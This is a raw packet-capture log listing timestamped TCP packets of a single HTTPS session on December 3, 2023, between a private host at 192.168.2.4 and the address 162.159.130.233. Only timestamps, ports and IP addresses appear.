Dec 3, 2023 17:23:01.477401018 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.477427959 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.477441072 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.477479935 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.477534056 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.477541924 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.477561951 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.477593899 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.477611065 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.477674007 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.477721930 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.477736950 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.477746010 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.477777004 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.477790117 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.477842093 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.477880955 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.477910042 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.477917910 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.477942944 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.477955103 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.477993965 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.478034019 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.478055954 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.478063107 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.478089094 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.478102922 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.478156090 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.478197098 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.478214025 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.478221893 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.478250027 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.478261948 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.478324890 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.478364944 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.478384018 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.478401899 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.478434086 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.478445053 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.478528023 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.478571892 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.478586912 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.478595972 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.478626013 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.478638887 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.478693962 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.478738070 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.478753090 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.478761911 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.478789091 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.478802919 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.478854895 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.478902102 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.478920937 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.478929043 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.478955984 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.478971004 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.479068041 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.479110003 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.479130983 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.479137897 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.479163885 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.479177952 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.479223967 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.479264975 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.479278088 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.479285955 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.479322910 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.479389906 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.479446888 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.479453087 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.479476929 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.479507923 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.479522943 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.479630947 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.479679108 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.479696035 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.479702950 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.479734898 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.479748011 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.479810953 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.479862928 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.479883909 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.479891062 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.479917049 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.479928970 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.479995966 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.480036974 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.480053902 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.480062008 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.480087996 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.480101109 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.480161905 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.480201960 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.480226040 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.480232954 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.480259895 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.480273962 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.480331898 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.480384111 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.480397940 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.480407953 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.480441093 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.480515957 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.480565071 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.480577946 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.480587959 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.480618954 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.480629921 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.480695963 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.480752945 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.689266920 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.689443111 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:02.117295027 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:02.117371082 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:02.949301004 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:02.949836016 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:03.767663002 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:03.767704010 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:03.767735958 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:03.767822027 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:03.767839909 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:03.767877102 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:03.767930984 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:03.767944098 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:03.767973900 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:03.767985106 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:03.768008947 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:03.768033028 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:03.768038034 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:03.768098116 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:03.768102884 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:03.768121958 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:03.768145084 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:03.768148899 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:03.768310070 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:03.768317938 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:03.768347025 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:03.768369913 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:03.768393040 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:03.768393040 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:03.768486023 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:03.768620014 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:03.768626928 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:03.768657923 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:03.768747091 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:03.977258921 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:03.977592945 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.370784044 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.370847940 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.370898962 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.370929003 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.371093988 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.371119022 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.371164083 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.371202946 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.371251106 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.371263027 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.371381044 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.371397018 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.371468067 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.371503115 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.371572018 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.371632099 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.371684074 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.371745110 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.371789932 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.371800900 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.371870995 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.371891975 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.371934891 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.371977091 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.371999025 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.372045040 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.372056961 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.372104883 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.372111082 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.372198105 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.372278929 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.372302055 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.372452974 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.372559071 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.372595072 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.372667074 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.372718096 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.372741938 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.372759104 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.372873068 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.372888088 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.372940063 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.373014927 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.373027086 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.373060942 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.373090029 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.373131037 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.373157024 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.373187065 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.373205900 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.373275042 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.373275042 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.373285055 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.373315096 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.373351097 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.373502970 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.373739004 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.373788118 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.373843908 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.373858929 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.373888969 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.373915911 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.373922110 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.373940945 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.373976946 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.373986006 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.374006033 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.374016047 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.374051094 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.374078989 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.374111891 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.374150991 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.374180079 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.374191999 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.374218941 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.374238014 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.374267101 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.374313116 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.374341011 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.374351025 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.374378920 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.374397993 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.374418020 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.374463081 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.374490023 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.374500990 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.374526978 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.374579906 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.374620914 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.374625921 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.374643087 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.374663115 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.374701023 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.374727964 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.374780893 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.374840021 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.374864101 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.374875069 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.374901056 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.374928951 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.374954939 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.374999046 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.375026941 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375037909 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.375062943 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375087023 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375111103 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.375152111 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.375191927 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375202894 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.375235081 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375262976 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375266075 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.375288963 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.375327110 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375329971 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.375355005 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375365973 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.375397921 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375425100 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375497103 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.375545979 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.375574112 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375585079 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.375612974 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375632048 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375659943 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.375699997 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.375726938 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375737906 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.375762939 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375785112 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375811100 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.375849962 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.375876904 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375888109 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.375938892 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375938892 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.375967026 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376009941 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376039982 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.376051903 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376101971 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.376101971 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.376125097 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376163960 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376195908 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.376207113 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376231909 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.376256943 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.376281977 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376321077 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376358986 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.376369953 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376394987 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.376420021 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.376434088 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376477957 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376506090 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.376517057 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376548052 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.376595020 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376635075 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.376637936 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376665115 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.376665115 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376703978 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.376729965 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.376781940 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376821995 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376852036 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.376862049 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376887083 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.376910925 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.376939058 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.376985073 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377015114 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377026081 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377051115 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377068996 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377101898 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377145052 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377173901 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377185106 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377234936 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377234936 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377295971 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377336025 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377362967 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377374887 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377399921 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377420902 CET	49739	443	192.168.2.4	162.159.130.233
